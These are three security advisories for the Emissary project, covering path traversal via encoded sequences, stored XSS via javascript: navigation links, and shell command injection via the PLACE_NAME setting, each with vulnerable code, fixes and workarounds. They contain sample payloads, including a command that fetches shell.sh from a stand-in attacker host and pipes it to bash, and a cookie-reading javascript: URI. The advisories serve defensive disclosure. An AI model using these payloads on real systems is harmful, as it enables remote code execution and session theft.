Package Instance

Emissary has a Path Traversal via Blacklist Bypass in Configuration API
## Summary

The configuration API endpoint (`/api/configuration/{name}`) validated
configuration names using a blacklist approach that checked for `\`, `/`, `..`,
and trailing `.`. This could potentially be bypassed using URL-encoded variants,
double-encoding, or Unicode normalization to achieve path traversal and read
configuration files outside the intended directory.

## Details

### Vulnerable code — `Configs.java` (line 126)

```java
protected static String validate(String config) {
    if (StringUtils.isBlank(config) || config.contains("\\") || config.contains("/")
        || config.contains("..") || config.endsWith(".")) {
        throw new IllegalArgumentException("Invalid config name: " + config);
    }
    return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);
}
```

### Weakness

The blacklist blocked literal `\`, `/`, `..`, and trailing `.` but could
potentially miss:

- URL-encoded variants (`%2e%2e%2f`) if decoded after validation
- Double-encoded sequences (`%252e%252e%252f`)
- Unicode normalization bypasses
- The approach relies on string matching rather than canonical path resolution

### Impact

- Potential read access to configuration files outside the intended config
  directory
- Information disclosure of sensitive configuration values

## Remediation

Fixed in [PR #1292](https://github.com/NationalSecurityAgency/emissary/pull/1292),
merged into release 8.39.0.

The blacklist was replaced with an allowlist regex that only permits characters
matching `^[a-zA-Z0-9._-]+$`:

```java
protected static final Pattern VALID_CONFIG_NAME = Pattern.compile("^[a-zA-Z0-9._-]+$");

protected static String validate(String config) {
    if (!VALID_CONFIG_NAME.matcher(config).matches() || config.contains("..") || config.endsWith(".")) {
        throw new IllegalArgumentException("Invalid config name: " + config);
    }
    return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);
}
```

This ensures that any character outside the allowed set — including encoded
slashes, percent signs, and Unicode sequences — is rejected before the config
name reaches the filesystem.

Tests were added to verify that URL-encoded (`%2e%2e%2f`), double-encoded
(`%252e%252e%252f`), and Unicode (`U+002F`) traversal attempts are blocked.

## Workarounds

If upgrading is not immediately possible, deploy a reverse proxy or WAF rule
that rejects requests to `/api/configuration/` containing encoded path traversal
sequences.

## References

- [PR #1292 — validate config name with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1292)
- Original report: GHSA-wjqm-p579-x3ww

Emissary has Stored XSS via Navigation Template Link Injection
## Summary

Mustache navigation templates interpolated configuration-controlled link values
directly into `href` attributes without URL scheme validation. An administrator
who could modify the `navItems` configuration could inject `javascript:` URIs,
enabling stored cross-site scripting (XSS) against other authenticated users
viewing the Emissary web interface.

## Details

### Vulnerable code — `nav.mustache` (line 10)

```html
{{#navItems}}
<li class="nav-item">
  <a class="nav-link" href="{{link}}">{{display}}</a>
</li>
{{/navItems}}
```

The `{{link}}` value was rendered without any scheme validation. Mustache's
default HTML escaping protects against injection of new HTML tags but does
**not** prevent `javascript:` URIs in `href` attributes, since `javascript:`
contains no characters that HTML-escaping would alter.

### Attack vector

An administrator sets a navigation item's link to:
```
javascript:alert(document.cookie)
```

Any authenticated user who clicks the navigation link executes the script in
their browser context.

### Impact

- Session hijacking via cookie theft
- Actions performed on behalf of the victim user
- Requires administrative access to modify navigation configuration
- Requires user interaction (clicking the malicious link)

### Mitigating factors

- Exploitation requires administrative access to modify the `navItems`
  configuration
- User interaction (clicking the link) is required
- The Emissary web interface is typically accessed only by authenticated
  operators within a trusted network

## Remediation

Fixed in [PR #1293](https://github.com/NationalSecurityAgency/emissary/pull/1293),
merged into release 8.39.0.

### Server-side link validation — `NavAction.java`

An allowlist regex was added that only permits `http://`, `https://`, or
site-relative (`/`) URLs:

```java
private static final Pattern VALID_LINK = Pattern.compile("^(https?:/)?/.*");

private static boolean isValidLink(String link) {
    if (!VALID_LINK.matcher(link).matches()) {
        logger.warn("Skipping invalid navigation link '{}'", link);
        return false;
    }
    return true;
}
```

Invalid links are logged and silently dropped from the rendered navigation.

### Template hardening — `nav.mustache`

Added `rel="noopener noreferrer"` to all navigation link anchor tags as a
defense-in-depth measure:

```html
<a class="nav-link" href="{{link}}" rel="noopener noreferrer">{{display}}</a>
```

Tests were added to verify that `javascript:` and `ftp://` URIs are rejected
while `http://`, `https://`, and site-relative (`/path`) links are accepted.

## Workarounds

If upgrading is not immediately possible, audit the navigation configuration
to ensure all `navItems` link values use only `http://`, `https://`, or
relative (`/`) URL schemes.

## References

- [PR #1293 — validate nav links](https://github.com/NationalSecurityAgency/emissary/pull/1293)
- Original report: GHSA-wjqm-p579-x3ww

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
## Summary

The `Executrix` utility class constructed shell commands by concatenating
configuration-derived values — including the `PLACE_NAME` parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through
into `/bin/sh -c` command execution.

## Details

### Vulnerable code — `Executrix.java`

**Insufficient sanitization (line 132):**
```java
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through
```

**Shell sink (line 1052–1058):**
```java
protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}
```

### Data flow

1. `PLACE_NAME` is read from a configuration file
2. `Executrix` applies only a space-to-underscore replacement
3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)
4. `tmpNames[DIR]` is concatenated into a shell command string
5. The command is executed via `/bin/sh -c`

### Example payload

```
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
```

After the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`
(semicolons, pipes, and other metacharacters preserved)

### Impact

- Arbitrary command execution on the Emissary host
- Requires the ability to control configuration values (e.g., administrative
  access or a compromised configuration source)

## Remediation

Fixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),
merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that strips all
characters not matching `[a-zA-Z0-9_-]`:

```java
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}
```

This ensures that any shell metacharacter in the `PLACE_NAME` configuration
value is replaced with an underscore before it can reach a command string.

Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.

## Workarounds

If upgrading is not immediately possible, ensure that `PLACE_NAME` values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.

## References

- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)
- Original report: GHSA-wjqm-p579-x3ww